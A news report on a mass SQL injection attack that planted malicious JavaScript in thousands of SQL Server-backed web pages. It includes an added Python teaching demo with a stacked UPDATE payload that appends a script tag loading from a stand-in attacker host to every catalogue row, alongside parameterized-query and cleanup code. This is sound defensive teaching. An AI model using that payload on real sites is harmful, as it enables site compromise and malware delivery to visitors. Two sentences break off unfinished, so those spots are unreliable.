70,000 Web Pages Hacked By Database Attack

The attacker penetrated the sites by discovering applications where the site builder expected a user name, address or other innocuous information to be typed in by the site visitor.
Web sites that accept visitor input, then fail to put strict checks on what that input may be or splice it directly into database queries, are susceptible to SQL injection attacks. That vulnerability appears to be the cause of up to 70,000 Web pages being hacked with malicious code between Dec. 28 and Jan. 5.
The intrusions represent a new level of threat to users on the Internet. Instead of launching a virus or worm at individual computers, the attack invaded Web databases and used them to host its malicious code, distributing it every time a site visitor requested information from the database beyond a home page or product page. Had it not relied on an old Windows exploit that most systems are already patched against, it might still be spreading across the Internet, security experts said.
"I don't think we've seen this scale of database intrusion before. SQL injection attacks are usually on a one-at-a-time basis," said Phil Neray, VP of marketing at Guardium, a Waltham, Mass., firm that makes database protection software.
The URL and server used to launch the attack were based in China, and a Chinese site was the first to post information on the attack. The domain now shows only the text "OK" followed by the ^_^ emoticon.
"This was a pretty good mass-hack, and it wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared," said Roger Thompson, chief research officer of Grisoft, producer of anti-virus software. Thompson is the founder of Exploit Prevention Labs, producer of LinkScan, which scans Web applications for malware. The firm was acquired by Grisoft in December.
The attacker found applications where the site builder expected a user name, address or other innocuous information to be typed in by the site visitor. The automated attack submitted a SQL statement instead of text through such forms, and thousands of Web applications apparently passed the statement straight through to the site database. The attack was launched Dec. 28. Security experts said the number of affected sites now appears to be declining, but it's not clear whether the attack has been completely stifled or might be relaunched from a new URL.
As of Jan. 5, it appeared to have peaked and was in reversal as sites closed the SQL injection exposures in the Web applications that front their databases. Neray estimated
Sites that show up in a Google search as containing the attack's original site URL include Rust-Oleum's Premiumgaragefloors.com; certain pages of CA, the system software vendor with a security product line; and the Haworth Press's seed catalogue, among many others. Thompson said in a Jan. 5 blog on the Grisoft Web site that Microsoft SQL Server databases ended up as the target of the attack, because the tables the injected statement touched are specific to SQL Server. But neither Neray nor Thompson could specify the purpose of the attack or what damage it might be doing beyond attaching JavaScript to text stored in the database. The intrusion of each database is massive: a JavaScript string is appended to every text item in the database, so the attack is most effective against a site with a catalogue or other large body of text stored in a SQL Server database. When a site visitor clicks a button or link such as "more information" in a catalogue, the database serves the stored text with the attacker's JavaScript attached, and that script attempts to plant code on the visitor's computer.
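The vulnerable input handling described above, and the cleanup problem a site owner faces once every text item carries the attacker's script, as an added example (not code from the article, from InformationWeek, or from any affected site). It uses Python's sqlite3 module with an in-memory database standing in for SQL Server; the product table, the visitor input, the batch-executing helper, the attacker.invalid script URL and SQLite's || concatenation (standing in for SQL Server's +) are all constructed for the demonstration.

```python
# Added example, not code from the article or from any affected site.  SQLite
# stands in for SQL Server; the table, the payload and the script URL are
# constructed for the demo so it runs offline.
import re
import sqlite3

# Constructed stand-in for the script tag the attack appended; not the real domain.
INJECTED_SCRIPT = '<script src="http://attacker.invalid/w.js"></script>'
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def make_catalogue():
    """Constructed catalogue table with text columns, as a product site might store."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (
            id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL);
        INSERT INTO products (name, description, price) VALUES
            ('Garage floor coating', 'Two-part epoxy for concrete floors', 79.99),
            ('Tomato seeds', 'Heirloom variety, 50 seeds', 3.49);
    """)
    return db


def run_batch(db, sql):
    """Model a driver that runs a whole ';'-separated batch, as SQL Server does.
    Returns the rows of the last SELECT.  The naive split is enough for the demo
    payload; accepting stacked statements is exactly what makes them dangerous."""
    rows = []
    for stmt in sql.split(";"):
        stmt = stmt.strip()
        if not stmt or stmt.startswith("--"):   # skip blanks and a comment-only tail
            continue
        cur = db.execute(stmt)
        if cur.description is not None:         # a SELECT produced columns
            rows = cur.fetchall()
    return rows


def search_vulnerable(db, visitor_input):
    """The bug: visitor text is concatenated into the statement, so a quote in the
    input closes the string literal and whatever follows is parsed as SQL."""
    sql = ("SELECT name, description FROM products "
           "WHERE name LIKE '%" + visitor_input + "%';")
    return run_batch(db, sql)


def search_safe(db, visitor_input):
    """The fix: visitor text is bound as a parameter and never parsed as SQL, so the
    same payload is just an odd search term.  (Escaping LIKE wildcards is separate.)"""
    return db.execute(
        "SELECT name, description FROM products WHERE name LIKE ?",
        ("%" + visitor_input + "%",),
    ).fetchall()


def attack_payload():
    """Stacked-statement payload of the kind the article describes: close the
    literal, append a script tag to every row's text, comment out the rest."""
    return ("'; UPDATE products SET description = description || '"
            + INJECTED_SCRIPT + "'; --")


def find_injected(db):
    """Cleanup check: walk every text column of every table and report
    (table, column, rowid) for values carrying a script tag.  On SQL Server the
    same walk reads INFORMATION_SCHEMA.COLUMNS.  Identifiers come from the
    catalogue, not from a visitor, so building these statements by f-string is fine."""
    hits = []
    tables = [r[0] for r in db.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        for _, col, ctype, *_ in db.execute(f'PRAGMA table_info("{table}")'):
            if ctype.upper() not in ("TEXT", "VARCHAR", "NVARCHAR"):
                continue
            for rowid, value in db.execute(f'SELECT rowid, "{col}" FROM "{table}"'):
                if isinstance(value, str) and SCRIPT_RE.search(value):
                    hits.append((table, col, rowid))
    return hits


def strip_injected(db):
    """Remove the script tags find_injected located; returns the number of rows fixed."""
    fixed = 0
    for table, col, rowid in find_injected(db):
        (value,) = db.execute(
            f'SELECT "{col}" FROM "{table}" WHERE rowid = ?', (rowid,)).fetchone()
        db.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                   (SCRIPT_RE.sub("", value), rowid))
        fixed += 1
    db.commit()
    return fixed


def demo():
    db = make_catalogue()
    payload = attack_payload()
    before = len(find_injected(db))       # clean database
    search_vulnerable(db, payload)        # visitor sees a normal result; the UPDATE runs too
    after = len(find_injected(db))        # every description now carries the tag
    search_safe(db, payload)              # same input, parameterized: no side effect
    fixed = strip_injected(db)
    return {"tainted_before": before, "tainted_after": after,
            "rows_cleaned": fixed, "tainted_after_cleanup": len(find_injected(db))}


if __name__ == "__main__":
    print(demo())
```

The visitor who submits the payload gets an ordinary search result back, which is why the compromise went unnoticed on the server side; the harm shows up only when other visitors later fetch the poisoned rows. The catalogue walk in find_injected is the check a site owner wants after such an attack: it reports which rows to fix rather than trusting that a single table was hit.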
But there's been no evidence of the attacker following through to activate the code placed on users' computers. The planted code targets a widely publicized Windows vulnerability, the one addressed by Microsoft security bulletin MS06-014, as reported by the Internet Storm Center, a site sponsored by the SANS Institute for quick identification of threats on the Internet.
Neray said attackers use such an approach when they are lining up many computers around the Web with which to stage a denial of service attack or other automated action against a particular Web site. He said it's also possible the attacker was merely demonstrating his ability to penetrate database systems and reach many users' computers. Unlike worms and viruses, the attack is aimed at Web site databases, which are then used to launch intrusions against users on a massive scale. As such, it illustrates
The Windows vulnerability the attack exploits has been known since September 2006, and many users' computers are likely to be protected from it by updates to their Windows operating system. In his Jan. 5 blog, Thompson said the attack on Web sites showed that the attackers "went to the trouble of preparing a good website exploit, and a good mass-hack, but then used a moldy old client exploit. It's almost a dichotomy." That is, had the successful Web site database attack been followed up with a sophisticated Windows client attack, the intruder might still be spreading across the Internet.
John Gormly, a blogger at myITforum.com Inc., commented Jan. 6: "Part of security software vendor CA's website was hacked last week and was redirecting visitors to a malicious website hosted in China. Although the problem now appears to have been corrected, cached versions of some pages in the press section of CA.com show that the site had been redirecting visitors to the uc8010.com domain, which has been serving malicious software since late December, according to Marcus Sachs, director of the SANS Internet Storm Center."
Source: www.informationweek.com

